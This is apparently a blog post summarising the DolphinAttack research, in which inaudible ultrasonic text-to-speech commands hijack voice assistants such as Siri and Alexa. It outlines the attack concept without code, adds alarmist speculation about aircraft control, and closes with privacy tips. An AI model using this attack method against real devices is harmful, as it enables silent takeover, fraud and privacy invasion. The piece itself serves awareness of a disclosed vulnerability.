DolphinAttack- simulated text to speech commands at ultra high frequencies can take over voice powered AI assistants

DolphinAttack- simulated text to speech commands at ultra high frequencies can take over voice powered AI assistants

Remember those books and movies we used to devour in our childhood where there would be a dog, who could respond to a sonic whistle (which no one else could hear) and save the day?

Well, that was fiction - but how often has life imitated fiction? Just open any Jules Verne book. Basically, whatever he wrote - Man went ahead and did it! <tangent/ go MAN, you rock>

The race for AI is on, and while exciting innovations are changing our lives fundamentally, the spectre of security has never been more omnipresent than now.

It will be more critical in the days to come.

Reams of PR headlines have been given to voice powered AI assistants in recent years. Alexa, Siri anyone? While it is a dream to be able to get these diminutive AI tools act on verbal commands, seems like they might have a very simple but serious back door flaw.

A team of six Chinese researchers from Zhejiang University have discovered a vulnerability in voice assistants from Apple, Google, Amazon, Microsoft, Samsung, and Huawei. "It affects every iPhone and Macbook running Siri, any Galaxy phone, any PC running Windows 10, and even Amazon’s Alexa assistant."

In a detailed research paper published here, the team has shown how with a $3 apparatus, hackers can simulate text to speech commands at ultra high frequencies inaudible to human ear to take over voice powered AI assistants, make unauthorised calls, open malicious websites, change a cars navigation route and so on.

Imagine Siri and Apple Pay?

Read this paper in detail. Titled " Dolphin Attack - Inaudible Voice Commands".

A truly fascinating theory put into practice to prove a hypothesis.

But before we go forward let's try and understand how sound frequencies work with respect to human hearing.

Untitled - 16.png

In summary, sound frequencies beyond 20KHZ to 10MHz are inaudible to the normal human ear.(but audible to phone microphones - more on that later)

Now let's look at how our voice commands transmit inside a phone and get an AI assistant to execute a command.

Image courtesy: Research Paper Dolphin Attack - Inaudible Voice Commands. Authors Guoming  Zhan, Chen Yan, Xiaoyu Ji, Tianchen Zhang, Taimin Zhang, Wenyuan Xu 

Image courtesy: Research Paper Dolphin Attack - Inaudible Voice Commands. Authors Guoming  Zhan, Chen Yan, Xiaoyu Ji, Tianchen Zhang, Taimin Zhang, Wenyuan Xu 

Image courtesy: Research Paper Dolphin Attack - Inaudible Voice Commands. Authors Guoming  Zhan, Chen Yan, Xiaoyu Ji, Tianchen Zhang, Taimin Zhang, Wenyuan Xu

Image courtesy: Research Paper Dolphin Attack - Inaudible Voice Commands. Authors Guoming  Zhan, Chen Yan, Xiaoyu Ji, Tianchen Zhang, Taimin Zhang, Wenyuan Xu

The challenge, however, lies in mimicking the voice pattern recorded in the AI memory at a higher frequency during wake-up mode.

That's where DolphinAttack comes in. (To clarify, DolphinAttack is an attack sequence built by the team to prove their hypothesis)

So what exactly is DolphinAttack?

Quoting from the paper: DolphinAttack - Inaudible voice commands

DolphinAttack utilizes inaudible voice Injection to control Voice Controlled Systems (VCSs) silently. Since attackers have little control of the VCSs, the key of a successful attack is to generate inaudible voice commands at the attacking transmitter. In particular, DolphinAttack has to generate the baseband signals of voice commands for both activation and recognition phases of the VCSs, modulate the baseband signals such that they can be demodulated at the VCSs silently, and design a portable transmitter that can launch DolphinAttack anywhere.

The architecture of DolphinAttack

Screen Shot 2017-09-08 at 12.03.40 AM.png

The researchers used the phenomenal advancement in Text to Speech technology (TTS) to convert text based commands into speech which could then be modulated at frequencies inaudible to the human ear. (by using a hardware module consisting of a phone, amplifier and ultrasonic transducer to activate Siri and take commands) 

Quoting from the research paper again, 

The recent advancement in TTS technique makes it easy to convert texts to voices. Thus, even if an attacker has no chances to obtain any voice recordings from the user, she can generate a set of activation commands that contain wake words by TTS (Text to Speech) systems. This is inspired by the observation that two users with similar vocal tones can activate the other’s Siri. Thus, as long as one of the activation commands in the set has a voice that is close enough to the owner, it suffices to activate Siri. In DolphinAttack, we prepare a set of activation commands with various tone and timbre with the help of existing TTS systems (summarized in Tab. 1), which include Selvy Speech, Baidu, Google, etc. In total, we obtain 90 types of TTS voices. We choose the Google TTS voice to train Siri and the rest for attacking.

Applications like Alexa and Siri work more on vocal tones than on exact voice pattern match. Using Google text to Speech, the researcher's trained Siri to respond to machine simulated commands during wake up mode.

This is the most difficult part, since speech recognition systems in smartphones only authenticate voice patterns during the wake-up message: eg " Hey Siri". They do not authenticate voice commands to launch applications once the system is activated. 

This is aided by the fact that the microphones and software that power voice assistants like Siri, Alexa, and Google Home can pick up inaudible frequencies–specifically, frequencies above the 20KhZ limits of human ears.

So in the scenario of a brute force attack, a hacker can activate any control command  (eg: open google/ show me restaurants on 5th street/ call 911) using easily available TTS API and tools on Google, Baidu and Selvy - once the wake-up sequence has been activated successfully.

Image courtesy: Research Paper Dolphin Attack - Inaudible Voice Commands. Authors Guoming  Zhan, Chen Yan, Xiaoyu Ji, Tianchen Zhang, Taimin Zhang, Wenyuan Xu

Image courtesy: Research Paper Dolphin Attack - Inaudible Voice Commands. Authors Guoming  Zhan, Chen Yan, Xiaoyu Ji, Tianchen Zhang, Taimin Zhang, Wenyuan Xu

This is a classic case of user friendliness coming to odds with personal security.

Chromecast, Amazon Dash - all use frequencies higher than 18kHZ to pair with phones. The experience is seamless and magical but based on this research, maybe at times a bit vulnerable - something we need to be cognizant of.

Automation is a boon but like most machine learning systems, it has its achilles heel. Today, browsers collect cookies, easily and invisibly. These cookies identify our web behaviour in relentless detail. We can identify individual mobile device IDs. Digital ads can follow us across the web. Maps have a scary way of knowing our routes home. Our phones back up our photos and contacts to the cloud. Our private lives are at the mercy of hackers with a penchant for voyeurism. 

Convenience is necessary. Even important, but like all benefits, it comes with a price. A hidden cost. Our personal security and vulnerability for starters.

Unchecked, this can go on to create a world, where someone sitting in a room with one laptop and a cloud server can control the transatlantic flight you are in at 40,000 feet or pay for a purchase you never made, using your phone and your stored credit card details within it.

Let's take a moment to think about that.

Oh and for the above scenario, just don't let AI powered voice assistants be always-on, in your phone. Use them when you need to. Close the applications down, once your need is complete. Unknowingly, we often let about 10-15 programs run always-on in the background (in our phones). These programs are constantly communicating with the network. Sending push notifications, updating databases in real time, mapping our coordinates - storing information about us and our behaviours. SILENTLY. RELENTLESSLY.

Let's go out. Listen to some music. Read a book.

Have a lollipop.

 

References:

1: This blog is an abstract based on the original research paper " DolphinAttack: Inaudible Voice Commands ", conducted and written by, Guoming  Zhan, Chen Yan, Xiaoyu Ji, Tianchen Zhang, Taimin Zhang, Wenyuan Xu of Zhejiang University, China.

Copyright of this work, the study and its findings belong to them.

The research paper is available publicly here

2: Fastcodeisgn.com

What are the basics of an API strategy ?

What are the basics of an API strategy ?